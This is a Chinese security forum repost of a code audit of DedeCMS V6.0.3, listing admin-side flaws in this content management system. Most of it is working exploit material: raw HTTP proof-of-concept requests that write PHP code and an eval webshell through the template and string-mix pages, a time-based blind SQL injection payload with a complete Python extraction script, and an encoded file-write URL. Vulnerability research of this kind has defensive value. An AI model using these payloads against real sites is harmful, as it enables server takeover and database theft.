设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 DedeCMSV6.0.3 代码审计
返回列表 发新帖
查看: 2927|回复: 0

DedeCMSV6.0.3 代码审计

[复制链接]
Delina

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-11-19 10:15:02 | 显示全部楼层 |阅读模式
原文链接:DedeCMSV6.0.3 代码审计

DedeCMSV6.0.3 代码审计one文件上传

可以上传php文件!
正在上传…[url=]重新上传[/url][url=]取消[/url]
发现什么过滤也没有!

RCE后台rce!

首先:增加个增加顶级栏目

再增加表 <?php phpinfo()?> 栏目!

DOM型xss

RCE

3个位置都可RCE!


代码审计黑盒做完了!再做做灰盒!
后台RCE1发现一处后台 可以写shell地方!验证一下:
文件:
src/dede/article_template_rand.php

但是要绕过csrftoken验证!这个用bp就行了!
src/dede/article_template_rand.php 文件后台存在命令执行漏洞!
执行poc
  1. POST /dede/article_template_rand.php?dopost=save HTTP/1.1
  2. Host: w.scy
  3. Pragma: no-cache
  4. Cache-Control: no-cache
  5. Upgrade-Insecure-Requests: 1
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  8. Accept-Encoding: gzip, deflate
  9. Accept-Language: zh-CN,zh;q=0.9
  10. Cookie: menuitems=5_1%2C6_1%2C3_1%2C4_1; XDEBUG_SESSION=PHPSTORM; ckCsrfToken=OAj3tMY65tksg4dRCcHekc7dBpBLZ312HPHD85EA; PHPSESSID=lup7qagfitqscbldpcisro0hj1; dede_csrf_token=a36eac1832db42e1161d7de75c2fdc55; dede_csrf_token__ckMd5=0e0ca51ba7e7ef88
  11. Connection: close
  12. Content-Length: 73
  13. Content-Type: application/x-www-form-urlencoded

  15. _csrf_token=a36eac1832db42e1161d7de75c2fdc55&templates=<?php phpinfo();?>
复制代码


保证下面即可 ,
/dede/article_template_rand.php?dopost=save _csrf_token=dede_csrf_token的值&templates=想执行的代码

命令写入成功

访问验证:
src/data/template.rand.php

写入成功!

写入shell!
​​



访问:src/data/template.rand.php

poc
  1. POST /dede/article_template_rand.php?dopost=save&templates=<?=eval($_POST[1]); HTTP/1.1
  2. Host: w.scy
  3. Content-Length: 44
  4. Pragma: no-cache
  5. Cache-Control: no-cache
  6. Upgrade-Insecure-Requests: 1
  7. Origin: http://w.scy
  8. Content-Type: application/x-www-form-urlencoded
  9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
  10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  11. Referer: http://w.scy/dede/article_template_rand.php
  12. Accept-Encoding: gzip, deflate
  13. Accept-Language: zh-CN,zh;q=0.9
  14. Cookie: menuitems=5_1%2C6_1%2C3_1%2C4_1; XDEBUG_SESSION=PHPSTORM; lastCid=1; lastCid__ckMd5=98429d7afc1a03cd; lastCidMenu=17; lastCidMenu__ckMd5=1405c63ce3057b17; ckCsrfToken=OAj3tMY65tksg4dRCcHekc7dBpBLZ312HPHD85EA; DedeUserID=1; DedeUserID__ckMd5=98429d7afc1a03cd; PHPSESSID=lup7qagfitqscbldpcisro0hj1; DedeLoginTime=1631246234; DedeLoginTime__ckMd5=cfc1e8591107fb8d; dede_csrf_token=d1d094594ef058ead28e6fb33bcbb4a1; dede_csrf_token__ckMd5=0ac5f86b9805777e
  15. Connection: close

  17. _csrf_token=d1d094594ef058ead28e6fb33bcbb4a1
复制代码


后台RCE2src/dede/article_string_mix.php 和rce1一样的原理!

执行poc
  1. POST /dede/article_string_mix.php?dopost=save HTTP/1.1
  2. Host: w.scy
  3. Content-Length: 71
  4. Pragma: no-cache
  5. Cache-Control: no-cache
  6. Upgrade-Insecure-Requests: 1
  7. Origin: http://w.scy
  8. Content-Type: application/x-www-form-urlencoded
  9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
  10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  11. Referer: http://w.scy/dede/article_string_mix.php
  12. Accept-Encoding: gzip, deflate
  13. Accept-Language: zh-CN,zh;q=0.9
  14. Cookie: menuitems=5_1%2C6_1%2C3_1%2C4_1; XDEBUG_SESSION=PHPSTORM; ckCsrfToken=OAj3tMY65tksg4dRCcHekc7dBpBLZ312HPHD85EA; PHPSESSID=lup7qagfitqscbldpcisro0hj1; XDEBUG_SESSION=PHPSTORM; dede_csrf_token=a36eac1832db42e1161d7de75c2fdc55; dede_csrf_token__ckMd5=0e0ca51ba7e7ef88
  15. Connection: close:

  17. allsource=<?php phpinfo();&_csrf_token=a36eac1832db42e1161d7de75c2fdc55

  19. POST /dede/article_string_mix.php?dopost=save
  20. allsource=执行的php代码&_csrf_token=cookie里dede_csrf_token的值
复制代码



后台RCE3


要保证几点!
1 cfg_cookie_encode 小于10
$row['value'] 就是咱的恶意代码了!
完了 复现的时候出问题了!$cfg_cookie_encode 改不了!我丢!不然应该可以玩一玩的!但是
任意文件删除漏洞src/dede/file_manage_control.php

src/dede/file_class.php

sql注入src/dede/member_do.php
  1. POST /dede/member_do.php HTTP/1.1
  2. Host: w.scy
  3. Content-Length: 178
  4. Pragma: no-cache
  5. Cache-Control: no-cache
  6. Upgrade-Insecure-Requests: 1
  7. Origin: http://w.scy
  8. Content-Type: application/x-www-form-urlencoded
  9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
  10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  11. Referer: http://w.scy/dede/member_do.php?id=111111111111&dopost=delmembers
  12. Accept-Encoding: gzip, deflate
  13. Accept-Language: zh-CN,zh;q=0.9
  14. Cookie: XDEBUG_SESSION=PHPSTORM; PHPSESSID=bprt1niss02u4hbl05mf5ajqkf; dede_csrf_token=a1b2c697e96fdfcccb122845ea3fa911; dede_csrf_token__ckMd5=87232a804321c45f; DedeUserID=1; DedeUserID__ckMd5=51977e27cd5892ea; DedeLoginTime=1631952495; DedeLoginTime__ckMd5=99f0d1aeb82b3e4e
  15. Connection: close

  17. fmdo=yes&dopost=delmembers&id=11113)/**/or/**/if(ascii(substr(DATABASE(),1,1))=100,SLEEP(1),0)#&randcode=34335&safecode=939783ba26dceb46dbabe5a8&safecode=939783ba26dceb46dbabe5a8
复制代码

要保证safecode和safecode一样! fmdo=yes dopost=delmembersid=11113)/**/or/**/if(ascii(substr(DATABASE(),1,1))=100,SLEEP(1),0)#
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # @Time    : 2021/5/22 12:45
  4. # @Author  : upload
  5. # @File    : 666.py
  6. # @Software: PyCharm
  7. import string

  9. proxy = '127.0.0.1:8080'
  10. proxies = {
  11.     'http': 'http://' + proxy,
  12.     'https': 'https://' + proxy,
  13. }

  15. strs = ','+string.ascii_letters + string.digits+''+'_!@#%^*{}.-}'

  17. #!/usr/bin/env python
  18. # -*- coding: utf-8 -*-
  19. # @Time    : 2021/8/15 13:45
  20. # @Author  : upload
  21. # @File    : [SWPU2019]Web4.py
  22. # @Software: PyCharm

  24. import requests
  25. import time

  27. proxy = '127.0.0.1:8080'
  28. proxies = {
  29.     'http': 'http://' + proxy,
  30.     'https': 'https://' + proxy,
  31. }


  34. burp0_url = "http://w.scy:80/dede/member_do.php"
  35. burp0_cookies = {"PHPSESSID": "bprt1niss02u4hbl05mf5ajqkf"}


  38. def str_to_hex(s):
  39.     return ''.join([hex(ord(c)).replace('0x', '') for c in s])


  42. flag=''
  43. for i in range(1,50):
  44.     f1=flag
  45.     top=127
  46.     low=33
  47.     while low<=top:

  49.         mid=(top+low)//2

  51.         payload1 = "11113)/**/or/**/if(ascii(substr(DATABASE(),{0},1))={1},SLEEP(2),0)#".format(i,mid)
  52.         payload2 = "11113)/**/or/**/if(ascii(substr(DATABASE(),{0},1))>{1},SLEEP(2),0)#".format(i,mid)
  53.         data1 = {"fmdo": "yes", "dopost": "delmembers",
  54.                       "id":payload1, "randcode": "34335",
  55.                       "safecode": "939783ba26dceb46dbabe5a8", "safecode": "939783ba26dceb46dbabe5a8"}

  57.         data2 = {"fmdo": "yes", "dopost": "delmembers",
  58.                       "id":payload2, "randcode": "34335",
  59.                       "safecode": "939783ba26dceb46dbabe5a8", "safecode": "939783ba26dceb46dbabe5a8"}
  60.         # print(json1,json2)
  61.         try:
  62.             print(i, mid)
  63.             r1 = requests.post(burp0_url, data=data1, proxies=proxies,timeout=3,cookies=burp0_cookies)
  64.         except requests.exceptions.ReadTimeout as e:
  65.             flag +=chr(mid)
  66.             print(flag)
  67.             break
  68.         else:
  69.             try:
  70.                 r2 = requests.post(burp0_url, data=data2,proxies=proxies,timeout =3,cookies=burp0_cookies)
  71.                 if r2.status_code == 429:
  72.                     print("fast2\n")
  73.                     time.sleep(1)

  75.             except requests.exceptions.ReadTimeout as e:
  76.                 low = mid + 1
  77.             else:
  78.                 top = mid - 1
  79.     if flag == f1:
  80.         break


  83. print(flag)
复制代码



类似的 调用ExecuteNoneQuery2函数的地方 都存在!sql注入!前提没waf!
sql注入2src/dede/member_do.php

  1. else if ($dopost == 'edituser') {
  2.     CheckPurview('member_Edit');
  3.     if (!isset($_POST['id'])) exit('Request Error!');
  4.     $pwdsql = empty($pwd) ? '' : ",pwd='" . md5($pwd) . "'";
  5.     if (empty($sex)) $sex = '男';
  6.     $uptime = GetMkTime($uptime);
  7. echo 222233;
  8. echo $id;
  9.     if ($matt == 10 && $oldmatt != 10) {
  10.         ShowMsg("对不起,为安全起见,不支持直接把前台会员转为管理的操作!", "-1");
  11.         exit();
  12.     }
  13.     $query = "UPDATE `#@__member` SET
  14.             email = '$email',
  15.             uname = '$uname',
  16.             sex = '$sex',
  17.             matt = '$matt',
  18.             money = '$money',
  19.             scores = '$scores',
  20.             rank = '$rank',
  21.             spacesta='$spacesta',
  22.             uptime='$uptime',
  23.             exptime='$exptime'
  24.             $pwdsql
  25.             WHERE mid='$id' AND matt<>10 ";
复制代码


sql 注入3src/dede/sys_admin_user_edit.php

没绕过在几个点文件写入src/dede/file_class.php 下面 MoveFile函数 但是$oldfile 是拼接的 !没法绕

文件写入找到了个文件写入!
poc
http://w.scy/dede/album_add.php?dopost=save&litpic_b64=,%50%44%39%77%61%48%41%67%5a%57%4e%6f%62%79%41%78%4d%54%45%37%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%77%3d%3d,a&typeid=1&channelid=1
但是写入的文件是图片!而且文件名随机!需要爆破!还需要文件包含!
总结就到这里把!以后再挖!


回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-28 18:34 , Processed in 0.017061 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表